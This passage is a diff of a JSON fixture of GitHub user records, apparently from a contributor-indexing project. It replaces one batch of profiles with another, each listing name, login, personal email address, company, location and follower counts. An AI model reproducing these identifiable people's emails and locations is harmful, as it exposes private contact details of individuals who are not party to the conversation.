"", - "login": "otbutz", + "nest_created_at": "2024-09-22T08:34:27.852Z", + "nest_updated_at": "2024-09-22T18:51:42.313Z", + "name": "Dirk Bäumer", + "login": "dbaeumer", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/22315436?v=4", - "company": "OPTITOOL GmbH", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1931590?v=4", + "company": "Microsoft", + "location": "Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, - "public_gists_count": 0, - "public_repositories_count": 38, - "created_at": "2016-09-20T07:39:50Z", - "updated_at": "2024-07-08T08:41:54Z", - "node_id": "MDQ6VXNlcjIyMzE1NDM2", + "following_count": 1, + "followers_count": 393, + "public_gists_count": 1, + "public_repositories_count": 30, + "created_at": "2012-07-06T09:09:15Z", + "updated_at": "2024-09-19T17:29:23Z", + "node_id": "MDQ6VXNlcjE5MzE1OTA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401828,24 +659927,49 @@ }, { "model": "github.user", - "pk": 1664, + "pk": 6961, "fields": { - "nest_created_at": "2024-09-12T00:22:14.695Z", - "nest_updated_at": "2024-09-12T00:22:14.695Z", - "name": "Matt Groth", - "login": "mgroth0", - "email": "mgroth49@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/12831489?v=4", + "nest_created_at": "2024-09-22T08:34:28.213Z", + "nest_updated_at": "2024-09-22T18:51:42.627Z", + "name": "Denis Malinochkin", + "login": "mrmlnc", + "email": "dmalinochkin@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7034281?v=4", + "company": "@yandex", + "location": "Odintsovo, Russia", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 299, + "public_gists_count": 18, + "public_repositories_count": 91, + "created_at": "2014-03-22T21:36:53Z", + "updated_at": "2024-09-07T13:13:10Z", + "node_id": "MDQ6VXNlcjcwMzQyODE=", + "bio": "Software engineer at @yandex.", + "is_hireable": false, + "twitter_username": "mrmlnc" + } +}, +{ + "model": "github.user", + "pk": 6962, + "fields": { + "nest_created_at": "2024-09-22T08:34:28.534Z", + "nest_updated_at": "2024-09-22T18:51:42.934Z", + "name": "David Sheldon", + "login": "davidsheldon", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37772?v=4", "company": "", - "location": "", + "location": "England", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 83, - "created_at": "2015-06-10T14:38:57Z", - "updated_at": "2024-08-09T21:43:31Z", - "node_id": "MDQ6VXNlcjEyODMxNDg5", + "followers_count": 3, + "public_gists_count": 5, + "public_repositories_count": 21, + "created_at": "2008-12-02T12:04:48Z", + "updated_at": "2024-05-12T20:04:15Z", + "node_id": "MDQ6VXNlcjM3Nzcy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -401853,149 +659977,149 @@ }, { "model": "github.user", - "pk": 1665, + "pk": 6963, "fields": { - "nest_created_at": "2024-09-12T00:22:15.922Z", - "nest_updated_at": "2024-09-12T00:22:15.922Z", - "name": "Bruno Azevedo", - "login": "BrunoJAzevedo", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/15171101?v=4", - "company": "Nutrium", - "location": "Viana do Castelo, Portugal", + "nest_created_at": "2024-09-22T08:34:28.854Z", + "nest_updated_at": "2024-09-22T18:51:43.246Z", + "name": "David Phillips", + "login": "electrum", + "email": "david@acz.org", + "avatar_url": "https://avatars.githubusercontent.com/u/9230?v=4", + "company": "@trinodb @starburstdata", + "location": "San Jose, CA", "collaborators_count": 0, - "following_count": 15, - "followers_count": 5, - "public_gists_count": 3, - "public_repositories_count": 16, - "created_at": "2015-10-17T13:09:01Z", - "updated_at": "2024-06-21T12:00:04Z", - "node_id": "MDQ6VXNlcjE1MTcxMTAx", - "bio": "MsC Student at Minho University. \r\n\r\nMobile Developer @Zetes\r\n", + "following_count": 46, + "followers_count": 592, + "public_gists_count": 95, + "public_repositories_count": 129, + "created_at": "2008-05-03T22:47:01Z", + "updated_at": "2024-09-13T11:28:22Z", + "node_id": "MDQ6VXNlcjkyMzA=", + "bio": "Creator of Trino (formerly PrestoSQL)", "is_hireable": false, - "twitter_username": "" + "twitter_username": "electrum32" } }, { "model": "github.user", - "pk": 1666, + "pk": 6964, "fields": { - "nest_created_at": "2024-09-12T00:22:16.743Z", - "nest_updated_at": "2024-09-12T00:22:16.743Z", - "name": "", - "login": "b-allard", + "nest_created_at": "2024-09-22T08:34:29.179Z", + "nest_updated_at": "2024-09-22T18:51:43.572Z", + "name": "david may", + "login": "wass3r", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/21167184?v=4", - "company": "", - "location": "Luxembourg", + "avatar_url": "https://avatars.githubusercontent.com/u/1301201?v=4", + "company": "@target @go-vela", + "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 5, - "created_at": "2016-08-22T05:49:57Z", - "updated_at": "2024-08-29T07:03:22Z", - "node_id": "MDQ6VXNlcjIxMTY3MTg0", - "bio": "I'm a Mobile Developer, I prefer develop in Android than iOS but it's a personal choice", + "following_count": 50, + "followers_count": 21, + "public_gists_count": 11, + "public_repositories_count": 18, + "created_at": "2012-01-03T14:27:44Z", + "updated_at": "2024-07-19T14:08:26Z", + "node_id": "MDQ6VXNlcjEzMDEyMDE=", + "bio": "(-(-_(-_-)_-)-)", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1667, + "pk": 6965, "fields": { - "nest_created_at": "2024-09-12T00:22:17.573Z", - "nest_updated_at": "2024-09-12T00:22:17.573Z", - "name": "İbrahim Halil TOPRAK", - "login": "haliltprkk", - "email": "haliltprkk@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/24190349?v=4", - "company": "@Commencis", - "location": "Samsun, İstanbul", + "nest_created_at": "2024-09-22T08:34:29.503Z", + "nest_updated_at": "2024-09-22T18:51:43.879Z", + "name": "David Díaz", + "login": "Seich", + "email": "seich@martianwabbit.com", + "avatar_url": "https://avatars.githubusercontent.com/u/206451?v=4", + "company": "@Alchemee ", + "location": "", "collaborators_count": 0, - "following_count": 48, - "followers_count": 31, - "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2016-11-26T13:49:31Z", - "updated_at": "2024-08-28T12:07:47Z", - "node_id": "MDQ6VXNlcjI0MTkwMzQ5", - "bio": "Software Engineer\r\n", + "following_count": 17, + "followers_count": 17, + "public_gists_count": 33, + "public_repositories_count": 109, + "created_at": "2010-02-19T02:54:25Z", + "updated_at": "2024-09-13T11:30:38Z", + "node_id": "MDQ6VXNlcjIwNjQ1MQ==", + "bio": "Developer and designer. Likes cats, plotters and electronics. The worst artist you've never heard of. ", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1668, + "pk": 6966, "fields": { - "nest_created_at": "2024-09-12T00:22:18.439Z", - "nest_updated_at": "2024-09-12T00:22:18.439Z", - "name": "Jonatan Rhodin", - "login": "Pururun", - "email": "jonatan.rhodin@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/1643265?v=4", - "company": "", - "location": "Gothenburg", + "nest_created_at": "2024-09-22T08:34:29.858Z", + "nest_updated_at": "2024-09-22T18:51:44.215Z", + "name": "David Bernard", + "login": "davidB", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10675?v=4", + "company": "Vector8", + "location": "France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 4, - "public_gists_count": 2, - "public_repositories_count": 4, - "created_at": "2012-04-14T15:22:40Z", - "updated_at": "2024-08-07T15:24:44Z", - "node_id": "MDQ6VXNlcjE2NDMyNjU=", - "bio": "", + "following_count": 1, + "followers_count": 162, + "public_gists_count": 18, + "public_repositories_count": 168, + "created_at": "2008-05-18T13:28:52Z", + "updated_at": "2024-08-28T11:20:08Z", + "node_id": "MDQ6VXNlcjEwNjc1", + "bio": "🦀 Rustaceans", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1669, + "pk": 6967, "fields": { - "nest_created_at": "2024-09-12T00:22:19.232Z", - "nest_updated_at": "2024-09-12T00:22:19.232Z", - "name": " Stefan Rybacki", - "login": "stefanrybacki", - "email": "stefan.rybacki@limbus-medtec.com", - "avatar_url": "https://avatars.githubusercontent.com/u/29799350?v=4", + "nest_created_at": "2024-09-22T08:34:30.176Z", + "nest_updated_at": "2024-09-22T18:51:44.526Z", + "name": "David Baumgold", + "login": "singingwolfboy", + "email": "david@davidbaumgold.com", + "avatar_url": "https://avatars.githubusercontent.com/u/132355?v=4", "company": "", - "location": "", + "location": "Amsterdam, NL", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2017-06-30T14:00:34Z", - "updated_at": "2024-09-02T11:22:16Z", - "node_id": "MDQ6VXNlcjI5Nzk5MzUw", - "bio": "", + "following_count": 57, + "followers_count": 487, + "public_gists_count": 176, + "public_repositories_count": 390, + "created_at": "2009-09-28T19:18:29Z", + "updated_at": "2024-09-20T21:31:28Z", + "node_id": "MDQ6VXNlcjEzMjM1NQ==", + "bio": "Web developer and technical trainer. Python and Javascript both inspire great ❤️ and great 😭. He/him", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1670, + "pk": 6968, "fields": { - "nest_created_at": "2024-09-12T00:22:20.061Z", - "nest_updated_at": "2024-09-18T19:03:32.094Z", - "name": "Petr H.", - "login": "holubec-petr", + "nest_created_at": "2024-09-22T08:34:30.489Z", + "nest_updated_at": "2024-09-22T18:51:44.839Z", + "name": "David Barnett", + "login": "dbarnett", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10357929?v=4", - "company": "Quadient", - "location": "Hradec Králové", + "avatar_url": "https://avatars.githubusercontent.com/u/65244?v=4", + "company": "", + "location": "Guadalajara, JA, MX", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2014-12-31T12:30:16Z", - "updated_at": "2024-01-08T13:38:55Z", - "node_id": "MDQ6VXNlcjEwMzU3OTI5", + "following_count": 51, + "followers_count": 50, + "public_gists_count": 6, + "public_repositories_count": 62, + "created_at": "2009-03-20T13:12:14Z", + "updated_at": "2024-09-22T03:43:39Z", + "node_id": "MDQ6VXNlcjY1MjQ0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402003,49 +660127,49 @@ }, { "model": "github.user", - "pk": 1671, + "pk": 6969, "fields": { - "nest_created_at": "2024-09-12T00:22:20.885Z", - "nest_updated_at": "2024-09-18T00:14:50.905Z", - "name": "Keith Hendershot", - "login": "Grimoren", - "email": "grimoren@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6591701?v=4", - "company": "", - "location": "Oakland,CA", + "nest_created_at": "2024-09-22T08:34:30.885Z", + "nest_updated_at": "2024-09-22T18:51:45.168Z", + "name": "Davi Paulino", + "login": "davilimap", + "email": "davilimap@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/11531010?v=4", + "company": "@Microsoft ", + "location": "Redmond, WA", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 16, "public_gists_count": 0, - "public_repositories_count": 13, - "created_at": "2014-02-05T04:46:46Z", - "updated_at": "2024-08-30T17:00:16Z", - "node_id": "MDQ6VXNlcjY1OTE3MDE=", + "public_repositories_count": 20, + "created_at": "2015-03-18T02:11:52Z", + "updated_at": "2024-09-13T12:32:52Z", + "node_id": "MDQ6VXNlcjExNTMxMDEw", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1672, + "pk": 6970, "fields": { - "nest_created_at": "2024-09-12T00:22:44.256Z", - "nest_updated_at": "2024-09-18T19:03:36.867Z", - "name": "Philipp Dallig", - "login": "Reamer", + "nest_created_at": "2024-09-22T08:34:31.534Z", + "nest_updated_at": "2024-09-22T18:51:45.807Z", + "name": "Florent Bécart", + "login": "fbecart", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/454320?v=4", - "company": "", - "location": "Berlin, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/763541?v=4", + "company": "Nikulipe", + "location": "Vilnius", "collaborators_count": 0, - "following_count": 9, - "followers_count": 33, - "public_gists_count": 6, + "following_count": 13, + "followers_count": 19, + "public_gists_count": 3, "public_repositories_count": 31, - "created_at": "2010-10-26T08:26:38Z", - "updated_at": "2024-09-18T11:21:51Z", - "node_id": "MDQ6VXNlcjQ1NDMyMA==", + "created_at": "2011-05-02T14:07:17Z", + "updated_at": "2024-08-09T17:46:35Z", + "node_id": "MDQ6VXNlcjc2MzU0MQ==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402053,24 +660177,24 @@ }, { "model": "github.user", - "pk": 1673, + "pk": 6971, "fields": { - "nest_created_at": "2024-09-12T00:22:45.906Z", - "nest_updated_at": "2024-09-12T00:22:45.906Z", - "name": "", - "login": "Gh0s7", + "nest_created_at": "2024-09-22T08:34:31.848Z", + "nest_updated_at": "2024-09-22T18:51:46.143Z", + "name": "Felix", + "login": "snoopotic", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3979059?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1191720?v=4", "company": "", - "location": "", + "location": "Dresden", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2013-03-26T21:05:28Z", - "updated_at": "2021-02-16T09:35:41Z", - "node_id": "MDQ6VXNlcjM5NzkwNTk=", + "following_count": 6, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 29, + "created_at": "2011-11-13T13:48:43Z", + "updated_at": "2024-09-18T06:34:07Z", + "node_id": "MDQ6VXNlcjExOTE3MjA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402078,24 +660202,24 @@ }, { "model": "github.user", - "pk": 1674, + "pk": 6972, "fields": { - "nest_created_at": "2024-09-12T00:22:49.650Z", - "nest_updated_at": "2024-09-12T00:33:48.959Z", - "name": "", - "login": "RunFox", + "nest_created_at": "2024-09-22T08:34:32.171Z", + "nest_updated_at": "2024-09-22T18:51:46.446Z", + "name": "Fai", + "login": "aicest", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/20059500?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/4016742?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 18, "public_gists_count": 0, - "public_repositories_count": 10, - "created_at": "2016-06-21T05:22:42Z", - "updated_at": "2024-08-21T12:20:33Z", - "node_id": "MDQ6VXNlcjIwMDU5NTAw", + "public_repositories_count": 0, + "created_at": "2013-03-31T02:01:05Z", + "updated_at": "2024-07-25T06:02:40Z", + "node_id": "MDQ6VXNlcjQwMTY3NDI=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402103,49 +660227,49 @@ }, { "model": "github.user", - "pk": 1675, + "pk": 6973, "fields": { - "nest_created_at": "2024-09-12T00:22:51.355Z", - "nest_updated_at": "2024-09-12T00:22:51.355Z", - "name": "Michał Kochanowicz", - "login": "michalkochanowicz", + "nest_created_at": "2024-09-22T08:34:32.485Z", + "nest_updated_at": "2024-09-22T18:51:46.759Z", + "name": "Fabio Huser", + "login": "fh1ch", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13177326?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7251776?v=4", + "company": "@siemens ", + "location": "Zug, Switzerland", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 10, + "followers_count": 82, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2015-07-04T13:50:14Z", - "updated_at": "2024-07-07T09:45:31Z", - "node_id": "MDQ6VXNlcjEzMTc3MzI2", + "public_repositories_count": 33, + "created_at": "2014-04-10T14:04:04Z", + "updated_at": "2024-07-17T16:39:30Z", + "node_id": "MDQ6VXNlcjcyNTE3NzY=", "bio": "", - "is_hireable": true, - "twitter_username": "" + "is_hireable": false, + "twitter_username": "fh1ch" } }, { "model": "github.user", - "pk": 1676, + "pk": 6974, "fields": { - "nest_created_at": "2024-09-12T00:22:53.006Z", - "nest_updated_at": "2024-09-18T19:03:37.182Z", - "name": "btai", - "login": "sudhirpandey", + "nest_created_at": "2024-09-22T08:34:33.670Z", + "nest_updated_at": "2024-09-22T18:51:47.471Z", + "name": "Esteban Brenes", + "login": "ebrenes", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1481305?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/408396?v=4", + "company": "Publicis Global Delivery", + "location": "San Jose, Costa Rica", "collaborators_count": 0, - "following_count": 1, - "followers_count": 3, - "public_gists_count": 17, - "public_repositories_count": 39, - "created_at": "2012-02-28T08:50:30Z", - "updated_at": "2024-05-27T19:46:07Z", - "node_id": "MDQ6VXNlcjE0ODEzMDU=", + "following_count": 7, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2010-09-20T14:24:00Z", + "updated_at": "2024-02-28T04:35:59Z", + "node_id": "MDQ6VXNlcjQwODM5Ng==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402153,49 +660277,49 @@ }, { "model": "github.user", - "pk": 1677, + "pk": 6975, "fields": { - "nest_created_at": "2024-09-12T00:22:55.088Z", - "nest_updated_at": "2024-09-12T00:22:55.088Z", - "name": "", - "login": "jordannstrong", + "nest_created_at": "2024-09-22T08:34:33.982Z", + "nest_updated_at": "2024-09-22T18:51:47.799Z", + "name": "Esta Nagy", + "login": "nagyesta", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1619315?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/308406?v=4", + "company": " EPAM Systems", + "location": "Hungary", "collaborators_count": 0, - "following_count": 2, - "followers_count": 1, + "following_count": 11, + "followers_count": 24, "public_gists_count": 0, - "public_repositories_count": 25, - "created_at": "2012-04-06T17:41:58Z", - "updated_at": "2024-06-02T16:15:59Z", - "node_id": "MDQ6VXNlcjE2MTkzMTU=", - "bio": "", + "public_repositories_count": 30, + "created_at": "2010-06-18T07:43:34Z", + "updated_at": "2024-09-11T16:26:43Z", + "node_id": "MDQ6VXNlcjMwODQwNg==", + "bio": "I am a Solution Architect during the day and a vigilante Java developer playing with my hobby projects by night.", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1678, + "pk": 6976, "fields": { - "nest_created_at": "2024-09-12T00:22:58.737Z", - "nest_updated_at": "2024-09-12T00:22:58.737Z", - "name": "", - "login": "erickramer51115", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/150371222?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:34.306Z", + "nest_updated_at": "2024-09-22T18:51:48.107Z", + "name": "Erik Seliger", + "login": "eseliger", + "email": "erikseliger@me.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19534377?v=4", + "company": "@sourcegraph", + "location": "Bremen, Germany", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 6, + "followers_count": 47, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-09T16:19:03Z", - "updated_at": "2023-11-09T16:19:03Z", - "node_id": "U_kgDOCPZ7lg", + "public_repositories_count": 36, + "created_at": "2016-05-23T14:36:17Z", + "updated_at": "2024-09-01T10:55:33Z", + "node_id": "MDQ6VXNlcjE5NTM0Mzc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402203,24 +660327,24 @@ }, { "model": "github.user", - "pk": 1679, + "pk": 6977, "fields": { - "nest_created_at": "2024-09-12T00:23:00.362Z", - "nest_updated_at": "2024-09-12T00:23:00.362Z", - "name": "", - "login": "platformbeheer-otv", + "nest_created_at": "2024-09-22T08:34:34.634Z", + "nest_updated_at": "2024-09-22T18:51:48.419Z", + "name": "Eric Sibly [chullybun]", + "login": "chullybun", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/136718055?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/12836934?v=4", "company": "", - "location": "", + "location": "West Island of New Zealand (aka Australia)", "collaborators_count": 0, "following_count": 1, - "followers_count": 0, + "followers_count": 6, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2023-06-15T13:24:30Z", - "updated_at": "2024-01-17T11:16:08Z", - "node_id": "U_kgDOCCYm5w", + "public_repositories_count": 3, + "created_at": "2015-06-10T22:45:55Z", + "updated_at": "2024-08-27T16:36:38Z", + "node_id": "MDQ6VXNlcjEyODM2OTM0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402228,49 +660352,49 @@ }, { "model": "github.user", - "pk": 1680, + "pk": 6978, "fields": { - "nest_created_at": "2024-09-12T00:23:02.115Z", - "nest_updated_at": "2024-09-12T00:23:02.115Z", - "name": "", - "login": "K44sper", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/16414789?v=4", - "company": "", - "location": "", + "nest_created_at": "2024-09-22T08:34:34.951Z", + "nest_updated_at": "2024-09-22T18:51:48.725Z", + "name": "Eric Hripko", + "login": "EricHripko", + "email": "eric@hripko.com", + "avatar_url": "https://avatars.githubusercontent.com/u/707679?v=4", + "company": "@bloomberg", + "location": "London, UK", "collaborators_count": 0, - "following_count": 6, - "followers_count": 2, - "public_gists_count": 0, - "public_repositories_count": 22, - "created_at": "2015-12-23T13:44:04Z", - "updated_at": "2024-05-28T15:42:47Z", - "node_id": "MDQ6VXNlcjE2NDE0Nzg5", - "bio": "AKA AKU", + "following_count": 1, + "followers_count": 15, + "public_gists_count": 5, + "public_repositories_count": 32, + "created_at": "2011-04-04T05:04:53Z", + "updated_at": "2024-09-20T17:59:18Z", + "node_id": "MDQ6VXNlcjcwNzY3OQ==", + "bio": "Software Engineer // opinions are my own", "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1681, + "pk": 6979, "fields": { - "nest_created_at": "2024-09-12T00:23:03.788Z", - "nest_updated_at": "2024-09-12T00:23:03.788Z", - "name": "Christian 'Pelle' Pelster", - "login": "pellepelster", - "email": "pelle@pelle.io", - "avatar_url": "https://avatars.githubusercontent.com/u/624069?v=4", + "nest_created_at": "2024-09-22T08:34:35.263Z", + "nest_updated_at": "2024-09-22T18:51:49.039Z", + "name": "Eric Andres", + "login": "emandres", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1034524?v=4", "company": "", - "location": "Hamburg", + "location": "", "collaborators_count": 0, - "following_count": 4, - "followers_count": 24, - "public_gists_count": 8, - "public_repositories_count": 22, - "created_at": "2011-02-17T21:03:48Z", - "updated_at": "2024-09-02T12:54:48Z", - "node_id": "MDQ6VXNlcjYyNDA2OQ==", + "following_count": 0, + "followers_count": 6, + "public_gists_count": 10, + "public_repositories_count": 43, + "created_at": "2011-09-08T01:24:19Z", + "updated_at": "2024-07-13T05:38:42Z", + "node_id": "MDQ6VXNlcjEwMzQ1MjQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402278,49 +660402,49 @@ }, { "model": "github.user", - "pk": 1682, + "pk": 6980, "fields": { - "nest_created_at": "2024-09-12T00:23:05.017Z", - "nest_updated_at": "2024-09-12T00:23:05.017Z", - "name": "Artur Kasperek", - "login": "arturkasperek", - "email": "arturmiks@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6894763?v=4", - "company": "JoVE.com", - "location": "Poland, Gliwice, Zawiercie", + "nest_created_at": "2024-09-22T08:34:35.597Z", + "nest_updated_at": "2024-09-22T18:51:49.352Z", + "name": "Enno Woortmann", + "login": "wol-soft", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14750468?v=4", + "company": "@Eventim ", + "location": "Germany", "collaborators_count": 0, - "following_count": 2, - "followers_count": 5, - "public_gists_count": 9, - "public_repositories_count": 45, - "created_at": "2014-03-08T23:04:49Z", - "updated_at": "2024-08-19T05:56:04Z", - "node_id": "MDQ6VXNlcjY4OTQ3NjM=", - "bio": "Programmer/DevOps/SRE", + "following_count": 12, + "followers_count": 21, + "public_gists_count": 0, + "public_repositories_count": 28, + "created_at": "2015-09-22T09:32:27Z", + "updated_at": "2024-07-10T10:55:00Z", + "node_id": "MDQ6VXNlcjE0NzUwNDY4", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 1683, + "pk": 6981, "fields": { - "nest_created_at": "2024-09-12T00:23:06.253Z", - "nest_updated_at": "2024-09-12T00:23:06.253Z", - "name": "", - "login": "Katheeja-Yasmin", + "nest_created_at": "2024-09-22T08:34:35.909Z", + "nest_updated_at": "2024-09-22T18:51:49.661Z", + "name": "Eigil Sagafos", + "login": "eigilsagafos", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/109402337?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3509385?v=4", + "company": "@shiftx", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-07-16T04:03:46Z", - "updated_at": "2024-07-11T06:33:48Z", - "node_id": "U_kgDOBoVY4Q", + "following_count": 4, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 24, + "created_at": "2013-02-08T08:40:19Z", + "updated_at": "2024-09-16T20:40:43Z", + "node_id": "MDQ6VXNlcjM1MDkzODU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402328,24 +660452,24 @@ }, { "model": "github.user", - "pk": 1684, + "pk": 6982, "fields": { - "nest_created_at": "2024-09-12T00:23:07.493Z", - "nest_updated_at": "2024-09-12T00:23:07.493Z", - "name": "Markus Wehrle", - "login": "markus2810", + "nest_created_at": "2024-09-22T08:34:36.226Z", + "nest_updated_at": "2024-09-22T18:51:49.970Z", + "name": "Edwin Kortman", + "login": "edwinkortman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2051899?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7047894?v=4", + "company": "Plateful AS", "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 2, + "following_count": 25, + "followers_count": 6, "public_gists_count": 1, - "public_repositories_count": 8, - "created_at": "2012-07-27T12:08:46Z", - "updated_at": "2024-07-29T10:27:37Z", - "node_id": "MDQ6VXNlcjIwNTE4OTk=", + "public_repositories_count": 30, + "created_at": "2014-03-24T14:14:55Z", + "updated_at": "2024-08-28T08:29:40Z", + "node_id": "MDQ6VXNlcjcwNDc4OTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -402353,74 +660477,74 @@ }, { "model": "github.user", - "pk": 1685, + "pk": 6983, "fields": { - "nest_created_at": "2024-09-12T00:23:08.926Z", - "nest_updated_at": "2024-09-12T00:23:08.926Z", - "name": "Ahmad Alfy", - "login": "ahmadalfy", - "email": "ahmadalfy@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/87611?v=4", - "company": "@RobustaStudio", - "location": "Egypt", + "nest_created_at": "2024-09-22T08:34:36.536Z", + "nest_updated_at": "2024-09-22T18:51:50.284Z", + "name": "Eblin Lopez", + "login": "eblin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1273928?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 112, - "followers_count": 824, + "following_count": 0, + "followers_count": 4, "public_gists_count": 2, - "public_repositories_count": 50, - "created_at": "2009-05-22T16:07:43Z", - "updated_at": "2024-09-03T09:40:52Z", - "node_id": "MDQ6VXNlcjg3NjEx", - "bio": "CTO @RobustaStudio , Google Developer Expert in Web Technologies.", - "is_hireable": true, - "twitter_username": "ahmadalfy" + "public_repositories_count": 15, + "created_at": "2011-12-19T22:26:33Z", + "updated_at": "2023-08-29T13:08:44Z", + "node_id": "MDQ6VXNlcjEyNzM5Mjg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" } }, { "model": "github.user", - "pk": 1686, + "pk": 6984, "fields": { - "nest_created_at": "2024-09-12T00:23:10.211Z", - "nest_updated_at": "2024-09-12T00:23:10.211Z", - "name": "Isa Guimiot", - "login": "isaguimiot", - "email": "isabelle.guimiot@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/31544133?v=4", - "company": "", - "location": "Montreal", + "nest_created_at": "2024-09-22T08:34:36.851Z", + "nest_updated_at": "2024-09-22T18:51:50.592Z", + "name": "Easton Pillay", + "login": "jedieaston", + "email": "easton@planeteaston.com", + "avatar_url": "https://avatars.githubusercontent.com/u/21368066?v=4", + "company": "Symetra", + "location": "United States", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 2, - "public_repositories_count": 0, - "created_at": "2017-09-01T14:56:51Z", - "updated_at": "2024-08-22T21:02:36Z", - "node_id": "MDQ6VXNlcjMxNTQ0MTMz", - "bio": "", - "is_hireable": false, + "following_count": 4, + "followers_count": 26, + "public_gists_count": 16, + "public_repositories_count": 41, + "created_at": "2016-08-31T17:29:18Z", + "updated_at": "2024-09-15T12:29:02Z", + "node_id": "MDQ6VXNlcjIxMzY4MDY2", + "bio": "Breaking stuff, taking names. or at least breaking stuff. \r\n\r\n\r\n", + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 1687, + "pk": 6985, "fields": { - "nest_created_at": "2024-09-12T00:23:11.438Z", - "nest_updated_at": "2024-09-12T00:23:11.438Z", - "name": "", - "login": "lizziebeans", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5188530?v=4", + "nest_created_at": "2024-09-22T08:34:37.162Z", + "nest_updated_at": "2024-09-22T18:51:50.900Z", + "name": "Colin Dunn", + "login": "colindunn", + "email": "cgd@vikingdev.net", + "avatar_url": 